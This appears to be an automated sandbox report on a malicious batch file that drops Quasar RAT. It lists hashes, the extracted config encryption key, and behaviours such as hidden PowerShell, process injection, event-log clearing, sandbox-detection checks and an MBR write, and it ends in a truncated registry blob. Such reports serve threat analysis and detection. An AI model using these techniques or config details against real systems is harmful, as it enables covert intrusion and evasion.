Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 08:57
Static task
static1
Behavioral task
behavioral1
Sample
21OHO_Loli.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
21OHO_Loli.bat
Resource
win10v2004-20241007-en
General
-
Target
21OHO_Loli.bat
-
Size
7.3MB
-
MD5
a09e8faa772f0db8527331f7a5420154
-
SHA1
fade919d96f8e44dca8d69a38570ee6ae31ab00e
-
SHA256
9efff51d5998c14eb13cb1678ed726f80c98dd600dcebe6fc2270066909149c0
-
SHA512
996e04fea10be101995214c005ed800d6ba3ae09acdb538240f43ca0f6dd9133895e32fa7c25a54d49b0e68b88cc8bc4e47d6c12e87b592130eb9a2294dc8174
-
SSDEEP
49152:Z8bxEQwP1/DFJYlW+qqW6pVXELMq8OoWLxixS7JaafipmP8BJjRQvyLdomw+l4uT:A
Malware Config
Extracted
quasar
-
encryption_key
7FD29E2D7A9259891E04CBE92EFCF4B072BA2B08
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/4864-1161-0x000002437D9B0000-0x000002437E11E000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1548 created 612 1548 powershell.exe 5 PID 4864 created 612 4864 powershell.exe 5 -
Blocklisted process makes network request 6 IoCs
flow pid Process 18 4864 powershell.exe 40 4864 powershell.exe 44 4864 powershell.exe 48 4864 powershell.exe 52 4864 powershell.exe 54 4864 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4864 powershell.exe 1548 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 4552 lNXbYr.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Z: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\$nya-iqYnz6h0 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1548 set thread context of 4448 1548 powershell.exe 87 PID 4864 set thread context of 1440 4864 powershell.exe 101 -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File created C:\Windows\$nya-onimai2\lNXbYr.exe powershell.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe -
Checks SCSI registry key(s) 3 TTPs 24 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Dec 2024 08:59:17 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02ygmmrhejyrygsu\Reason = "2147780641" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C0109CD933C9 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b00000000020000000000106600000001000020000000f23e9db1ceda20f3a30bc3c0d3ccc196158ab3125ad4f78bd4aa0b23ffcc8e3e000000000e800000000200002000000023f8415955fd8d32d90730dba7cf1e622b40c2e0843ce9f35147170622474fcf800000003e6646f50d63660ce3e542c038aaff82a819c4b8ba2c43edff593130e9388982a0716c6fd4cdf5d0f9ac5193c2de1e033af1c6b4535ef3ef7f293d95dd219d9fc40a4c7f1ff47076c8a88e8a8fe7911e42ebd20fd8264c4759075a4c3163ef4db1e4a95f70c68908fffe498840906dcf8f4021fa377748250f318aaac9e8513d4000000053edb92eeb6df5837f4ea29f27c6afa9f2578ac3564714931bd0e03064e3504bdbbc499b7eceb8710bd5c59195c859f6cee82190db600bffeda320c0e8afb843 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxarfvgzxkmqjh svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C0109CD933C9" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C0109CD933C9" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02ygmmrhejyrygsu\Response Saturday, December 28, 2024 08:58:02 = "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" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02ygmmrhejyrygsu\Request Saturday, December 28, 2024 08:58:02 = "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